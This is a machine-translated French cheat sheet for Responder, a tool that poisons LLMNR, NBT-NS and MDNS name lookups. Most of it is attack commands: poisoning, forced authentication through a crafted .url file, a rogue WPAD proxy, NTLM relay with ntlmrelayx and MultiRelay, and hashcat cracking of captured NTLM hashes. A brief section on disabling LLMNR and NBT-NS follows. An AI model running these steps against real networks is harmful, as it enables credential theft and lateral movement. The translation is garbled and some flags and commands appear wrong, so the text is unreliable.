Répondeur Feuille de chaleur
Aperçu général
Le répondeur est un puissant empoisonneur LLMNR (Lien-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) et MDNS (Multicast DNS). Il est conçu pour répondre à des requêtes de résolution de noms de réseau spécifiques et comprend des serveurs d'authentification rogue HTTP/SMB/MSSQL/FTP/LDAP intégrés supportant l'authentification NTLMv1/NTLMv2/LMv2.
C'est pas vrai. Attention: Responder est un outil de test de sécurité qui ne devrait être utilisé que dans les environnements où vous avez la permission explicite de le faire.
Installation
Kali Linux
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
De GitHub
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
```_
### Utilisation de pip
```bash
# Install using pip
pip install Responder
```_
## Utilisation de base
### Répondre au démarrage
```bash
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
Options de ligne de commande
| Option | Description |
|---|---|
-h, --help |
Show help message and exit |
-A, --analyze |
Analyze mode. Do not poison any requests, just analyze traffic |
-I <interface> |
Network interface to use |
-i <IP> |
IP address to bind to |
-e <IP> |
External IP address (for DHCP options) |
-b, --basic |
Return a Basic HTTP authentication. Default: NTLM |
-r, --wredir |
Enable answers for netbios wredir suffix queries |
-d, --NBTNSdomain |
Enable answers for netbios domain suffix queries |
-f, --fingerprint |
Fingerprint hosts that issued an NBT-NS or LLMNR query |
-w, --wpad |
Start the WPAD rogue proxy server |
-u, --upstream-proxy |
Upstream HTTP proxy used by the rogue WPAD proxy |
-F, --ForceWpadAuth |
Force NTLM/Basic authentication on wpad.dat file retrieval |
-P, --ProxyAuth |
Force NTLM/Basic authentication for any proxy request |
-lm, --LM |
Force LM hashing downgrade for Windows XP/2003 and earlier |
-v, --verbose |
Increase verbosity |
--log-local |
Log to file in addition to console |
-s, --disable-syslog |
Do not log to syslog |
-S, --disable-stdout |
Do not log to stdout |
-c, --config |
Path to configuration file |
--server=SERVER |
Enable/disable specific server (HTTP, SMB, etc.) |
--sql |
Enable the MSSQL server |
--mssql |
Enable the MSSQL server |
--https |
Enable the HTTPS server |
--http |
Enable the HTTP server |
--smb |
Enable the SMB server |
--ftp |
Enable the FTP server |
--imap |
Enable the IMAP server |
--pop |
Enable the POP server |
--smtp |
Enable the SMTP server |
--ldap |
Enable the LDAP server |
--dns |
Enable the DNS server |
Fichier de configuration
Le fichier de configuration est situé à /etc/responder/Responder.conf ou dans le répertoire Responder sous Responder.conf.
Options de configuration clés
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
Scénarios d'attaque
Empoisonnement de base LLMNR/NBT-NS
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
Authentification forcée via UNC Voie
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
WPAD Attaque
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
Configuration de l'attaque de relais
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
Capture de hache et cracking
Affichage des hashés capturés
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
Cracking avec Hashcat
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
Techniques avancées
Utilisation de Responder avec MultiRelay
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
Hôtes d'empoisonnement spécifiques
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
Valeur du défi personnalisé
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
Mesures défensives
Désactivation du LLMNR par la politique de groupe
- Éditeur de politiques du groupe ouvert
- Naviguez vers la configuration informatique > Modèles administratifs > Réseau > DNS Client
- Activer "Débrancher la résolution de nom multicast"
Désactiver NBT-NS via la ligne de commande
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
Désactiver NBT-NS via le registre
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)
Détecter l'activité du répondant
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
Dépannage
Questions communes
- ** Conflits de port** ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'
# Kill conflicting processes
sudo kill
- Interface introuvable ```bash # List available interfaces ip a
# Use the correct interface name
responder -I
-
Émissions de permis
bash # Run with sudo sudo responder -I eth0 -
Pas de hashés capturés
bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths
Ressources
- [Répertoire officiel GitHub] (LINK_3)
- [MITRE ATT&CK - LLMNR/NBT-NS Poisonnage] (LINK_3)
- [Kali Linux Tools - Répondre] (LINK_3)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Responder dans les scénarios de tests de sécurité. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *